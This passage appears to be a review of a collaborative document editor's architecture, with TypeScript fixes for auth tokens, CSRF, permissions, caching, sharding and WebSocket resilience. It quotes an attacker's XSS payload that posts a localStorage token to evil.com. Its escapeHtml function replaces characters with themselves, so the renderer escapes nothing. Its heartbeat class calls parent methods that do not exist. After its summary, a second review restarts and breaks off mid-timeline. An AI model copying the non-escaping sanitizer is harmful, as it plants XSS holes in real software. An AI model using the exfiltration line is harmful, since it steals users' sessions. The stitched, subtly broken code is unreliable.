return marks.filter(m => this.allowedMarks.has(m.type));
}
private sanitizeAttrs(nodeType: string, attrs: Record<string, any>): Record<string, any> {
const sanitized: Record<string, any> = {};
switch (nodeType) {
case 'heading':
sanitized.level = Math.min(6, Math.max(1, parseInt(attrs.level) || 1));
break;
case 'link':
// Only allow safe URL schemes
if (attrs.href && /^https?:\/\//.test(attrs.href)) {
sanitized.href = attrs.href;
}
break;
case 'image':
if (attrs.src && /^https?:\/\//.test(attrs.src)) {
sanitized.src = attrs.src;
sanitized.alt = String(attrs.alt || '').slice(0, 500);
}
break;
}
return sanitized;
}
}
// Render to HTML only on output
class DocumentRenderer {
render(node: DocumentNode): string {
switch (node.type) {
case 'doc':
return node.content?.map(n => this.render(n)).join('') ?? '';
case 'paragraph':
return `<p>${this.renderContent(node)}</p>`;
case 'heading':
const level = node.attrs?.level ?? 1;
return `<h${level}>${this.renderContent(node)}</h${level}>`;
case 'text':
let text = this.escapeHtml(node.text ?? '');
for (const mark of node.marks ?? []) {
text = this.applyMark(text, mark);
}
return text;
default:
return this.renderContent(node);
}
}
private escapeHtml(text: string): string {
return text
.replace(/&/g, '&')
.replace(/</g, '<')
.replace(/>/g, '>')
.replace(/"/g, '"');
}
private applyMark(text: string, mark: Mark): string {
switch (mark.type) {
case 'bold': return `<strong>${text}</strong>`;
case 'italic': return `<em>${text}</em>`;
case 'code': return `<code>${text}</code>`;
case 'link': return `<a href="${this.escapeHtml(mark.attrs?.href ?? '')}">${text}</a>`;
default: return text;
}
}
}
The Problem: Any XSS vulnerability (from user content, third-party scripts, browser extensions) can steal tokens.
// Attacker's XSS payload
fetch('https://evil.com/steal', {
method: 'POST',
body: localStorage.getItem('token')
});
// Attacker now has 24-hour access to victim's account
Solution: HTTP-Only Cookies with Proper Security Flags
// Server-side: Set secure cookies
import { Response } from 'express';
class AuthService {
setAuthCookies(res: Response, tokens: { accessToken: string; refreshToken: string }): void {
// Access token - short lived, used for API calls
res.cookie('access_token', tokens.accessToken, {
httpOnly: true, // Not accessible via JavaScript
secure: true, // HTTPS only
sameSite: 'strict', // CSRF protection
maxAge: 15 * 60 * 1000, // 15 minutes
path: '/api' // Only sent to API routes
});
// Refresh token - longer lived, only sent to refresh endpoint
res.cookie('refresh_token', tokens.refreshToken, {
httpOnly: true,
secure: true,
sameSite: 'strict',
maxAge: 7 * 24 * 60 * 60 * 1000, // 7 days
path: '/api/auth/refresh' // Only sent to refresh endpoint
});
// CSRF token - readable by JavaScript, verified on state-changing requests
const csrfToken = crypto.randomBytes(32).toString('hex');
res.cookie('csrf_token', csrfToken, {
httpOnly: false, // Readable by JavaScript
secure: true,
sameSite: 'strict',
maxAge: 15 * 60 * 1000
});
}
}
// Middleware to verify CSRF token
function csrfProtection(req: Request, res: Response, next: NextFunction): void {
if (['POST', 'PUT', 'DELETE', 'PATCH'].includes(req.method)) {
const cookieToken = req.cookies.csrf_token;
const headerToken = req.headers['x-csrf-token'];
if (!cookieToken || !headerToken || cookieToken !== headerToken) {
return res.status(403).json({ error: 'Invalid CSRF token' });
}
}
next();
}
// Client-side: Include CSRF token in requests
class ApiClient {
private getCsrfToken(): string {
return document.cookie
.split('; ')
.find(row => row.startsWith('csrf_token='))
?.split('=')[1] ?? '';
}
async request(url: string, options: RequestInit = {}): Promise<Response> {
return fetch(url, {
...options,
credentials: 'include', // Include cookies
headers: {
...options.headers,
'X-CSRF-Token': this.getCsrfToken()
}
});
}
}
WebSocket Authentication:
// WebSocket connections need special handling since they don't send cookies automatically
class SecureWebSocketServer {
handleUpgrade(request: IncomingMessage, socket: Socket, head: Buffer): void {
// Option 1: Verify cookie on upgrade
const cookies = this.parseCookies(request.headers.cookie ?? '');
const accessToken = cookies.access_token;
try {
const payload = this.verifyToken(accessToken);
this.wss.handleUpgrade(request, socket, head, (ws) => {
(ws as any).userId = payload.userId;
this.wss.emit('connection', ws, request);
});
} catch (error) {
socket.write('HTTP/1.1 401 Unauthorized\r\n\r\n');
socket.destroy();
}
}
// Option 2: Ticket-based authentication
async generateWebSocketTicket(userId: string): Promise<string> {
const ticket = crypto.randomBytes(32).toString('hex');
// Store ticket with short expiry
await this.redis.setex(`ws_ticket:${ticket}`, 30, userId);
return ticket;
}
async validateTicket(ticket: string): Promise<string | null> {
const userId = await this.redis.get(`ws_ticket:${ticket}`);
if (userId) {
await this.redis.del(`ws_ticket:${ticket}`); // One-time use
}
return userId;
}
}
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| HTTP-only cookies | XSS-resistant | Need CSRF protection, more complex |
| localStorage + fingerprinting | Simpler | Vulnerable to XSS |
| Session IDs only | Most secure | Requires server-side session store |
The Problem: If a token is compromised, the attacker has 24 hours of access. For a document editor with sensitive content, this is too risky.
Solution: Short-Lived Access Tokens with Refresh Token Rotation
class TokenService {
private readonly ACCESS_TOKEN_EXPIRY = '15m';
private readonly REFRESH_TOKEN_EXPIRY = '7d';
async generateTokenPair(userId: string): Promise<TokenPair> {
const tokenFamily = crypto.randomUUID();
const accessToken = jwt.sign(
{ userId, type: 'access' },
process.env.JWT_SECRET!,
{ expiresIn: this.ACCESS_TOKEN_EXPIRY }
);
const refreshToken = jwt.sign(
{ userId, type: 'refresh', family: tokenFamily },
process.env.JWT_REFRESH_SECRET!,
{ expiresIn: this.REFRESH_TOKEN_EXPIRY }
);
// Store refresh token hash for revocation
await this.redis.setex(
`refresh:${tokenFamily}`,
7 * 24 * 60 * 60,
JSON.stringify({
userId,
tokenHash: this.hashToken(refreshToken),
createdAt: Date.now()
})
);
return { accessToken, refreshToken };
}
async refreshTokens(refreshToken: string): Promise<TokenPair | null> {
try {
const payload = jwt.verify(refreshToken, process.env.JWT_REFRESH_SECRET!) as any;
// Check if token family is still valid
const storedData = await this.redis.get(`refresh:${payload.family}`);
if (!storedData) {
// Token family was revoked - possible token theft!
await this.revokeAllUserSessions(payload.userId);
return null;
}
const stored = JSON.parse(storedData);
// Verify token hash matches
if (stored.tokenHash !== this.hashToken(refreshToken)) {
// Token reuse detected - revoke family
await this.redis.del(`refresh:${payload.family}`);
await this.revokeAllUserSessions(payload.userId);
return null;
}
// Generate new token pair (rotation)
const newTokens = await this.generateTokenPair(payload.userId);
// Invalidate old family
await this.redis.del(`refresh:${payload.family}`);
return newTokens;
} catch (error) {
return null;
}
}
private hashToken(token: string): string {
return crypto.createHash('sha256').update(token).digest('hex');
}
async revokeAllUserSessions(userId: string): Promise<void> {
// In production, use a more efficient approach with user-specific key patterns
const keys = await this.redis.keys('refresh:*');
for (const key of keys) {
const data = await this.redis.get(key);
if (data && JSON.parse(data).userId === userId) {
await this.redis.del(key);
}
}
}
}
The Problem: The architecture doesn't mention access control. Can any authenticated user access any document?
Solution: Document Permission System
enum Permission {
VIEW = 'view',
COMMENT = 'comment',
EDIT = 'edit',
ADMIN = 'admin'
}
interface DocumentAccess {
documentId: string;
principalType: 'user' | 'group' | 'organization' | 'public';
principalId: string | null; // null for public
permission: Permission;
}
class DocumentAuthorizationService {
private cache: Redis;
private pool: Pool;
async checkPermission(
userId: string,
documentId: string,
requiredPermission: Permission
): Promise<boolean> {
// Check cache first
const cacheKey = `authz:${userId}:${documentId}`;
const cached = await this.cache.get(cacheKey);
if (cached) {
return this.permissionSatisfies(cached as Permission, requiredPermission);
}
// Query database
const effectivePermission = await this.getEffectivePermission(userId, documentId);
// Cache for 5 minutes
if (effectivePermission) {
await this.cache.setex(cacheKey, 300, effectivePermission);
}
return this.permissionSatisfies(effectivePermission, requiredPermission);
}
private async getEffectivePermission(
userId: string,
documentId: string
): Promise<Permission | null> {
const { rows } = await this.pool.query(`
WITH user_groups AS (
SELECT group_id FROM group_members WHERE user_id = $1
),
user_org AS (
SELECT organization_id FROM users WHERE id = $1
)
SELECT permission FROM document_access
WHERE document_id = $2
AND (
(principal_type = 'user' AND principal_id = $1)
OR (principal_type = 'group' AND principal_id IN (SELECT group_id FROM user_groups))
OR (principal_type = 'organization' AND principal_id = (SELECT organization_id FROM user_org))
OR (principal_type = 'public')
)
ORDER BY
CASE permission
WHEN 'admin' THEN 4
WHEN 'edit' THEN 3
WHEN 'comment' THEN 2
WHEN 'view' THEN 1
END DESC
LIMIT 1
`, [userId, documentId]);
return rows[0]?.permission ?? null;
}
private permissionSatisfies(has: Permission | null, needs: Permission): boolean {
if (!has) return false;
const hierarchy: Record<Permission, number> = {
[Permission.VIEW]: 1,
[Permission.COMMENT]: 2,
[Permission.EDIT]: 3,
[Permission.ADMIN]: 4
};
return hierarchy[has] >= hierarchy[needs];
}
// Invalidate cache when permissions change
async invalidateDocumentCache(documentId: string): Promise<void> {
const keys = await this.cache.keys(`authz:*:${documentId}`);
if (keys.length > 0) {
await this.cache.del(...keys);
}
}
}
// Middleware
function requirePermission(permission: Permission) {
return async (req: Request, res: Response, next: NextFunction) => {
const { documentId } = req.params;
const userId = req.user!.id;
const hasPermission = await authzService.checkPermission(
userId,
documentId,
permission
);
if (!hasPermission) {
return res.status(403).json({ error: 'Insufficient permissions' });
}
next();
};
}
// Usage
app.get('/api/documents/:documentId', requirePermission(Permission.VIEW), getDocument);
app.put('/api/documents/:documentId', requirePermission(Permission.EDIT), updateDocument);
app.delete('/api/documents/:documentId', requirePermission(Permission.ADMIN), deleteDocument);
The Problem: Caching API responses for collaborative documents is fundamentally broken:
10:00:00 - Alice requests document, CDN caches response
10:00:30 - Bob edits document
10:04:59 - Alice requests document again, gets stale cached version
Alice sees version from 5 minutes ago!
Solution: Proper Cache Control Headers
class CacheControlMiddleware {
// Never cache document content or real-time data
static noCache(req: Request, res: Response, next: NextFunction): void {
res.set({
'Cache-Control': 'no-store, no-cache, must-revalidate, proxy-revalidate',
'Pragma': 'no-cache',
'Expires': '0',
'Surrogate-Control': 'no-store'
});
next();
}
// Cache static assets aggressively
static staticAssets(req: Request, res: Response, next: NextFunction): void {
res.set({
'Cache-Control': 'public, max-age=31536000, immutable'
});
next();
}
// Cache user-specific data privately with revalidation
static privateWithRevalidation(maxAge: number) {
return (req: Request, res: Response, next: NextFunction) => {
res.set({
'Cache-Control': `private, max-age=${maxAge}, must-revalidate`,
'Vary': 'Authorization, Cookie'
});
next();
};
}
// Cache public data with ETag validation
static publicWithEtag(req: Request, res: Response, next: NextFunction): void {
res.set({
'Cache-Control': 'public, max-age=0, must-revalidate',
'Vary': 'Accept-Encoding'
});
next();
}
}
// Apply to routes
app.use('/api/documents/:id/content', CacheControlMiddleware.noCache);
app.use('/api/documents/:id/operations', CacheControlMiddleware.noCache);
app.use('/api/users/me', CacheControlMiddleware.privateWithRevalidation(60));
app.use('/api/documents', CacheControlMiddleware.publicWithEtag); // List with ETags
app.use('/static', CacheControlMiddleware.staticAssets);
What CAN be cached:
// Safe to cache:
// 1. Static assets (JS, CSS, images) - with content hash in filename
// 2. User profile data - short TTL, private
// 3. Document metadata (title, last modified) - with ETag validation
// 4. Organization/team data - short TTL
// CloudFront configuration
const cloudFrontBehaviors = {
'/static/*': {
TTL: 31536000, // 1 year
compress: true,
headers: ['Origin']
},
'/api/documents/*/content': {
TTL: 0, // Never cache
forwardCookies: 'all',
forwardHeaders: ['Authorization']
},
'/api/*': {
TTL: 0,
forwardCookies: 'all',
forwardHeaders: ['Authorization', 'X-CSRF-Token']
}
};
The Problem: Using PostgreSQL for real-time sync creates:
100 users typing at 5 chars/second = 500 writes/second
1000 users = 5000 writes/second
PostgreSQL will struggle, and latency will spike
Solution: Tiered Storage Architecture
class TieredDocumentStorage {
private redis: Redis;
private pool: Pool;
private operationBuffer: Map<string, DocumentOperation[]> = new Map();
private flushInterval: NodeJS.Timeout;
constructor() {
// Flush buffered operations every 100ms
this.flushInterval = setInterval(() => this.flushBuffers(), 100);
}
async applyOperation(op: DocumentOperation): Promise<void> {
// Layer 1: Immediate - Redis for real-time sync
await this.redis.multi()
.xadd(
`doc:${op.documentId}:ops`,
'MAXLEN', '~', '1000',
'*',
'data', JSON.stringify(op)
)
.publish(`doc:${op.documentId}`, JSON.stringify(op))
.exec();
// Layer 2: Buffered - Batch writes to PostgreSQL
if (!this.operationBuffer.has(op.documentId)) {
this.operationBuffer.set(op.documentId, []);
}
this.operationBuffer.get(op.documentId)!.push(op);
}
private async flushBuffers(): Promise<void> {
const buffers = new Map(this.operationBuffer);
this.operationBuffer.clear();
for (const [documentId, operations] of buffers) {
if (operations.length === 0) continue;
try {
await this.batchInsertOperations(operations);
} catch (error) {
// Re-queue failed operations
const existing = this.operationBuffer.get(documentId) ?? [];
this.operationBuffer.set(documentId, [...operations, ...existing]);
console.error(`Failed to flush operations for ${documentId}:`, error);
}
}
}
private async batchInsertOperations(operations: DocumentOperation[]): Promise<void> {
const values = operations.map((op, i) => {
const offset = i * 7;
return `($${offset + 1}, $${offset + 2}, $${offset + 3}, $${offset + 4}, $${offset + 5}, $${offset + 6}, $${offset + 7})`;
}).join(', ');
const params = operations.flatMap(op => [
op.id, op.documentId, op.userId, op.revision,
JSON.stringify(op.operation), JSON.stringify(op.timestamp), op.checksum
]);
await this.pool.query(`
INSERT INTO document_operations
(id, document_id, user_id, revision, operation, timestamp, checksum)
VALUES ${values}
ON CONFLICT (document_id, revision) DO NOTHING
`, params);
}
// Recovery: Rebuild from PostgreSQL if Redis data is lost
async recoverFromPostgres(documentId: string, fromRevision: number): Promise<DocumentOperation[]> {
const { rows } = await this.pool.query(`
SELECT * FROM document_operations
WHERE document_id = $1 AND revision > $2
ORDER BY revision ASC
`, [documentId, fromRevision]);
return rows.map(row => ({
id: row.id,
documentId: row.document_id,
userId: row.user_id,
revision: row.revision,
operation: JSON.parse(row.operation),
timestamp: JSON.parse(row.timestamp),
checksum: row.checksum
}));
}
}
The Problem: Large organizations (e.g., enterprise customers) create hot partitions:
Organization A (10 users): Partition 1 - light load
Organization B (10,000 users): Partition 2 - overwhelmed
Organization C (50 users): Partition 3 - light load
Solution: Document-Level Sharding with Consistent Hashing
class DocumentShardRouter {
private shards: ShardInfo[];
private hashRing: ConsistentHashRing;
constructor(shards: ShardInfo[]) {
this.shards = shards;
this.hashRing = new ConsistentHashRing(
shards.map(s => s.id),
100 // Virtual nodes per shard
);
}
getShardForDocument(documentId: string): ShardInfo {
const shardId = this.hashRing.getNode(documentId);
return this.shards.find(s => s.id === shardId)!;
}
// Rebalance when adding/removing shards
async addShard(newShard: ShardInfo): Promise<void> {
this.shards.push(newShard);
this.hashRing.addNode(newShard.id);
// Migrate affected documents
await this.migrateDocuments(newShard);
}
private async migrateDocuments(targetShard: ShardInfo): Promise<void> {
// Find documents that should now be on the new shard
for (const shard of this.shards) {
if (shard.id === targetShard.id) continue;
const documents = await this.getDocumentsOnShard(shard);
for (const doc of documents) {
const correctShard = this.getShardForDocument(doc.id);
if (correctShard.id === targetShard.id) {
await this.migrateDocument(doc.id, shard, targetShard);
}
}
}
}
}
// Shard-aware connection pool
class ShardedConnectionPool {
private pools: Map<string, Pool> = new Map();
private router: DocumentShardRouter;
async query(documentId: string, sql: string, params: any[]): Promise<QueryResult> {
const shard = this.router.getShardForDocument(documentId);
const pool = this.pools.get(shard.id);
if (!pool) {
throw new Error(`No pool for shard ${shard.id}`);
}
return pool.query(sql, params);
}
// Cross-shard queries (avoid when possible)
async queryAll(sql: string, params: any[]): Promise<QueryResult[]> {
const results = await Promise.all(
Array.from(this.pools.values()).map(pool => pool.query(sql, params))
);
return results;
}
}
Alternative: Vitess or Citus for Automatic Sharding
-- Citus distributed table
SELECT create_distributed_table('document_operations', 'document_id');
SELECT create_distributed_table('documents', 'id');
-- Queries automatically route to correct shard
SELECT * FROM documents WHERE id = 'doc-123'; -- Routes to one shard
SELECT * FROM documents WHERE organization_id = 'org-456'; -- Fan-out query
The Problem: Read replicas can be seconds behind the primary, causing users to see stale data:
10:00:00.000 - Alice saves document (writes to primary)
10:00:00.500 - Alice refreshes page (reads from replica)
Replica is 1 second behind - Alice sees old version!
"Where did my changes go?!"
Solution: Read-Your-Writes Consistency
class ConsistentReadService {
private primaryPool: Pool;
private replicaPool: Pool;
private redis: Redis;
async read(
userId: string,
documentId: string,
query: string,
params: any[]
): Promise<QueryResult> {
// Check if user recently wrote to this document
const lastWriteTime = await this.redis.get(`write:${userId}:${documentId}`);
if (lastWriteTime) {
const timeSinceWrite = Date.now() - parseInt(lastWriteTime);
// If write was recent, check replica lag
if (timeSinceWrite < 10000) { // Within 10 seconds
const replicaLag = await this.getReplicaLag();
if (replicaLag * 1000 > timeSinceWrite) {
// Replica hasn't caught up - read from primary
return this.primaryPool.query(query, params);
}
}
}
// Safe to read from replica
return this.replicaPool.query(query, params);
}
async write(
userId: string,
documentId: string,
query: string,
params: any[]
): Promise<QueryResult> {
const result = await this.primaryPool.query(query, params);
// Track write time for read-your-writes consistency
await this.redis.setex(
`write:${userId}:${documentId}`,
60, // Track for 60 seconds
Date.now().toString()
);
return result;
}
private async getReplicaLag(): Promise<number> {
const { rows } = await this.replicaPool.query(`
SELECT EXTRACT(EPOCH FROM (NOW() - pg_last_xact_replay_timestamp())) AS lag
`);
return rows[0]?.lag ?? 0;
}
}
// Alternative: LSN-based consistency
class LSNConsistentReadService {
async write(userId: string, query: string, params: any[]): Promise<{ result: QueryResult; lsn: string }> {
const result = await this.primaryPool.query(query, params);
// Get current WAL position
const { rows } = await this.primaryPool.query('SELECT pg_current_wal_lsn()::text AS lsn');
const lsn = rows[0].lsn;
// Store LSN for user's session
await this.redis.setex(`session:${userId}:lsn`, 300, lsn);
return { result, lsn };
}
async read(userId: string, query: string, params: any[]): Promise<QueryResult> {
const requiredLsn = await this.redis.get(`session:${userId}:lsn`);
if (requiredLsn) {
// Wait for replica to catch up (with timeout)
await this.waitForReplicaLsn(requiredLsn, 5000);
}
return this.replicaPool.query(query, params);
}
private async waitForReplicaLsn(targetLsn: string, timeoutMs: number): Promise<void> {
const start = Date.now();
while (Date.now() - start < timeoutMs) {
const { rows } = await this.replicaPool.query(`
SELECT pg_last_wal_replay_lsn() >= $1::pg_lsn AS caught_up
`, [targetLsn]);
if (rows[0].caught_up) return;
await new Promise(resolve => setTimeout(resolve, 50));
}
// Timeout - fall back to primary
throw new Error('Replica lag timeout');
}
}
The Problem: WebSocket connections drop frequently (network changes, mobile sleep, etc.). Without proper reconnection, users lose real-time updates.
Solution: Robust Reconnection with Exponential Backoff
class ResilientWebSocket {
private ws: WebSocket | null = null;
private url: string;
private reconnectAttempts = 0;
private maxReconnectAttempts = 10;
private baseDelay = 1000;
private maxDelay = 30000;
private messageQueue: string[] = [];
private lastEventId: string | null = null;
constructor(url: string) {
this.url = url;
this.connect();
}
private connect(): void {
// Include last event ID for resumption
const connectUrl = this.lastEventId
? `${this.url}?lastEventId=${this.lastEventId}`
: this.url;
this.ws = new WebSocket(connectUrl);
this.ws.onopen = () => {
console.log('WebSocket connected');
this.reconnectAttempts = 0;
this.flushMessageQueue();
};
this.ws.onclose = (event) => {
if (event.code !== 1000) { // Not a clean close
this.scheduleReconnect();
}
};
this.ws.onerror = (error) => {
console.error('WebSocket error:', error);
};
this.ws.onmessage = (event) => {
const data = JSON.parse(event.data);
if (data.eventId) {
this.lastEventId = data.eventId;
}
this.handleMessage(data);
};
}
private scheduleReconnect(): void {
if (this.reconnectAttempts >= this.maxReconnectAttempts) {
console.error('Max reconnection attempts reached');
this.onMaxRetriesExceeded?.();
return;
}
const delay = Math.min(
this.baseDelay * Math.pow(2, this.reconnectAttempts) + Math.random() * 1000,
this.maxDelay
);
console.log(`Reconnecting in ${delay}ms (attempt ${this.reconnectAttempts + 1})`);
setTimeout(() => {
this.reconnectAttempts++;
this.connect();
}, delay);
}
send(message: string): void {
if (this.ws?.readyState === WebSocket.OPEN) {
this.ws.send(message);
} else {
// Queue message for when connection is restored
this.messageQueue.push(message);
}
}
private flushMessageQueue(): void {
while (this.messageQueue.length > 0 && this.ws?.readyState === WebSocket.OPEN) {
const message = this.messageQueue.shift()!;
this.ws.send(message);
}
}
// Callbacks
onMessage?: (data: any) => void;
onMaxRetriesExceeded?: () => void;
private handleMessage(data: any): void {
this.onMessage?.(data);
}
}
Server-Side: Event Resumption
class WebSocketServer {
private redis: Redis;
async handleConnection(ws: WebSocket, req: Request): Promise<void> {
const documentId = req.query.documentId as string;
const lastEventId = req.query.lastEventId as string | undefined;
// Send missed events if client is resuming
if (lastEventId) {
const missedEvents = await this.getMissedEvents(documentId, lastEventId);
for (const event of missedEvents) {
ws.send(JSON.stringify(event));
}
}
// Subscribe to new events
this.subscribeToDocument(documentId, ws);
}
private async getMissedEvents(documentId: string, lastEventId: string): Promise<any[]> {
// Use Redis Streams for event sourcing
const events = await this.redis.xrange(
`doc:${documentId}:events`,
lastEventId,
'+',
'COUNT', 1000
);
return events
.filter(([id]) => id !== lastEventId) // Exclude the last seen event
.map(([id, fields]) => ({
eventId: id,
...this.parseStreamFields(fields)
}));
}
}
The Problem: Silent connection failures (NAT timeout, proxy disconnect) aren't detected, leaving "zombie" connections.
Solution: Bidirectional Heartbeat
// Client-side
class HeartbeatWebSocket extends ResilientWebSocket {
private heartbeatInterval: NodeJS.Timeout | null = null;
private heartbeatTimeout: NodeJS.Timeout | null = null;
private readonly HEARTBEAT_INTERVAL = 30000; // 30 seconds
private readonly HEARTBEAT_TIMEOUT = 10000; // 10 seconds to respond
protected onOpen(): void {
super.onOpen();
this.startHeartbeat();
}
protected onClose(): void {
this.stopHeartbeat();
super.onClose();
}
private startHeartbeat(): void {
this.heartbeatInterval = setInterval(() => {
if (this.ws?.readyState === WebSocket.OPEN) {
this.ws.send(JSON.stringify({ type: 'ping', timestamp: Date.now() }));
this.heartbeatTimeout = setTimeout(() => {
console.log('Heartbeat timeout - closing connection');
this.ws?.close();
}, this.HEARTBEAT_TIMEOUT);
}
}, this.HEARTBEAT_INTERVAL);
}
private stopHeartbeat(): void {
if (this.heartbeatInterval) clearInterval(this.heartbeatInterval);
if (this.heartbeatTimeout) clearTimeout(this.heartbeatTimeout);
}
protected handleMessage(data: any): void {
if (data.type === 'pong') {
if (this.heartbeatTimeout) clearTimeout(this.heartbeatTimeout);
return;
}
super.handleMessage(data);
}
}
// Server-side
class WebSocketServerWithHeartbeat {
private readonly CLIENT_TIMEOUT = 60000; // 60 seconds without activity
handleConnection(ws: WebSocket): void {
let lastActivity = Date.now();
const checkTimeout = setInterval(() => {
if (Date.now() - lastActivity > this.CLIENT_TIMEOUT) {
console.log('Client timeout - closing connection');
ws.close(4000, 'Timeout');
clearInterval(checkTimeout);
}
}, 10000);
ws.on('message', (message) => {
lastActivity = Date.now();
const data = JSON.parse(message.toString());
if (data.type === 'ping') {
ws.send(JSON.stringify({ type: 'pong', timestamp: Date.now() }));
return;
}
this.handleMessage(ws, data);
});
ws.on('close', () => {
clearInterval(checkTimeout);
});
}
}
The Problem: When components fail, the entire system becomes unusable instead of degrading gracefully.
Solution: Circuit Breakers and Fallbacks
import CircuitBreaker from 'opossum';
class ResilientDocumentService {
private dbBreaker: CircuitBreaker;
private redisBreaker: CircuitBreaker;
private localCache: LRUCache<string, Document>;
constructor() {
// Database circuit breaker
this.dbBreaker = new CircuitBreaker(this.queryDatabase.bind(this), {
timeout: 3000, // 3 second timeout
errorThresholdPercentage: 50, // Open after 50% failures
resetTimeout: 30000, // Try again after 30 seconds
volumeThreshold: 10 // Minimum requests before opening
});
this.dbBreaker.fallback(async (documentId: string) => {
// Try Redis cache
return this.getFromRedis(documentId);
});
this.dbBreaker.on('open', () => {
console.error('Database circuit breaker opened');
this.alertOps('Database circuit breaker opened');
});
// Redis circuit breaker
this.redisBreaker = new CircuitBreaker(this.queryRedis.bind(this), {
timeout: 1000,
errorThresholdPercentage: 50,
resetTimeout: 10000
});
this.redisBreaker.fallback(async (key: string) => {
// Fall back to local cache
return this.localCache.get(key);
});
}
async getDocument(documentId: string): Promise<Document | null> {
try {
// Try local cache first
const cached = this.localCache.get(documentId);
if (cached) return cached;
// Try Redis (through circuit breaker)
const redisDoc = await this.redisBreaker.fire(documentId);
if (redisDoc) {
this.localCache.set(documentId, redisDoc);
return redisDoc;
}
// Try database (through circuit breaker)
const dbDoc = await this.dbBreaker.fire(documentId);
if (dbDoc) {
this.localCache.set(documentId, dbDoc);
await this.cacheInRedis(documentId, dbDoc);
return dbDoc;
}
return null;
} catch (error) {
console.error('All fallbacks failed:', error);
throw new ServiceUnavailableError('Document service temporarily unavailable');
}
}
// Degraded mode: Allow viewing but not editing
async saveOperation(op: DocumentOperation): Promise<SaveResult> {
try {
await this.dbBreaker.fire(op);
return { success: true };
} catch (error) {
if (this.dbBreaker.opened) {
// Queue operation for later processing
await this.queueForRetry(op);
return {
success: false,
queued: true,
message: 'Your changes are saved locally and will sync when service is restored'
};
}
throw error;
}
}
}
The Problem: Without proper observability, you can't diagnose issues or understand system behavior.
Solution: Comprehensive Observability Stack
import { metrics, trace, context } from '@opentelemetry/api';
import { PrometheusExporter } from '@opentelemetry/exporter-prometheus';
class DocumentMetrics {
private meter = metrics.getMeter('document-service');
private tracer = trace.getTracer('document-service');
// Counters
private operationsTotal = this.meter.createCounter('document_operations_total', {
description: 'Total number of document operations'
});
private conflictsTotal = this.meter.createCounter('document_conflicts_total', {
description: 'Total number of operation conflicts'
});
// Histograms
private operationLatency = this.meter.createHistogram('document_operation_latency_ms', {
description: 'Latency of document operations in milliseconds'
});
private syncLatency = this.meter.createHistogram('document_sync_latency_ms', {
description: 'Time from operation submission to all clients receiving it'
});
// Gauges
private activeConnections = this.meter.createObservableGauge('websocket_connections_active', {
description: 'Number of active WebSocket connections'
});
private documentSize = this.meter.createHistogram('document_size_bytes', {
description: 'Size of documents in bytes'
});
// Instrument an operation
async trackOperation<T>(
operationType: string,
documentId: string,
fn: () => Promise<T>
): Promise<T> {
const span = this.tracer.startSpan(`document.${operationType}`, {
attributes: {
'document.id': documentId,
'operation.type': operationType
}
});
const startTime = Date.now();
try {
const result = await context.with(trace.setSpan(context.active(), span), fn);
this.operationsTotal.add(1, {
operation: operationType,
status: 'success'
});
return result;
} catch (error) {
span.recordException(error as Error);
this.operationsTotal.add(1, {
operation: operationType,
status: 'error',
error_type: (error as Error).name
});
throw error;
} finally {
const duration = Date.now() - startTime;
this.operationLatency.record(duration, {
operation: operationType
});
span.end();
}
}
recordConflict(documentId: string, conflictType: string): void {
this.conflictsTotal.add(1, {
document_id: documentId,
conflict_type: conflictType
});
}
recordSyncLatency(latencyMs: number): void {
this.syncLatency.record(latencyMs);
}
}
// Structured logging
import pino from 'pino';
const logger = pino({
level: process.env.LOG_LEVEL || 'info',
formatters: {
level: (label) => ({ level: label })
},
base: {
service: 'document-service',
version: process.env.APP_VERSION
}
});
// Usage
class DocumentService {
private metrics = new DocumentMetrics();
private logger = logger.child({ component: 'DocumentService' });
async applyOperation(op: DocumentOperation): Promise<void> {
return this.metrics.trackOperation('apply', op.documentId, async () => {
this.logger.info({
event: 'operation_received',
documentId: op.documentId,
userId: op.userId,
revision: op.revision
});
// ... apply operation
this.logger.info({
event: 'operation_applied',
documentId: op.documentId,
newRevision: op.revision
});
});
}
}
| Issue | Severity | Effort | Priority |
|---|---|---|---|
| Client clock timestamps | 🔴 Critical | Medium | P0 |
| Paragraph-level LWW | 🔴 Critical | High | P0 |
| Cross-server WebSocket isolation | 🔴 Critical | Medium | P0 |
| 30-second snapshot data loss | 🔴 Critical | Medium | P0 |
| JWT in localStorage | 🟠 High | Low | P1 |
| CDN caching API responses | 🟠 High | Low | P1 |
| Missing document authorization | 🟠 High | Medium | P1 |
| PostgreSQL as message bus | 🟠 High | High | P1 |
| No WebSocket reconnection | 🟡 Medium | Low | P2 |
| No heartbeat/keep-alive | 🟡 Medium | Low | P2 |
| Read replica lag | 🟡 Medium | Medium | P2 |
| Organization-based sharding | 🟡 Medium | High | P2 |
| HTML storage (XSS) | 🟡 Medium | Medium | P2 |
| Missing observability | 🟡 Medium | Medium | P2 |
| No circuit breakers | 🟢 Low | Medium | P3 |
┌─────────────────────────────────────────────────────────────────────────────┐
│ Load Balancer │
│ (Sticky sessions by document ID) │
└─────────────────────────────────────────────────────────────────────────────┘
│
┌─────────────────┼─────────────────┐
▼ ▼ ▼
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ API Server │ │ API Server │ │ API Server │
│ + WebSocket │ │ + WebSocket │ │ + WebSocket │
│ + OT Engine │ │ + OT Engine │ │ + OT Engine │
└──────────────┘ └──────────────┘ └──────────────┘
│ │ │
└─────────────────┼─────────────────┘
│
┌─────────────────┼─────────────────┐
▼ ▼ ▼
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ Redis │ │ Redis │ │ Redis │
│ (Primary) │ │ (Replica) │ │ (Replica) │
│ - Pub/Sub │ │ │ │ │
│ - Op Cache │ │ │ │ │
│ - Sessions │ │ │ │ │
└──────────────┘ └──────────────┘ └──────────────┘
│
┌─────────────────┼─────────────────┐
▼ ▼ ▼
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ PostgreSQL │ │ PostgreSQL │ │ PostgreSQL │
│ (Primary) │ │ (Replica) │ │ (Replica) │
│ - Documents │ │ (Read-only) │ │ (Read-only) │
│ - Operations│ │ │ │ │
│ - Snapshots │ │ │ │ │
└──────────────┘ └──────────────┘ └──────────────┘
This architecture addresses all critical issues while maintaining scalability and reliability.
This architecture has several critical flaws that would cause data loss, inconsistency, and poor user experience at scale. I'll work through every layer systematically.
The Flaw: Each API server only broadcasts changes to its own WebSocket clients. Other servers discover changes by polling PostgreSQL every 2 seconds.
Timeline showing the problem:
Server A (Alice connected) Server B (Bob connected)
───────────────────────────────── ─────────────────────────────────
t=0.0s Alice types "Hello"
t=0.0s Broadcast to Server A
clients ✓
t=0.0s Write to PostgreSQL
t=0.1s Bob types "World"
t=0.1s Broadcast to Server B
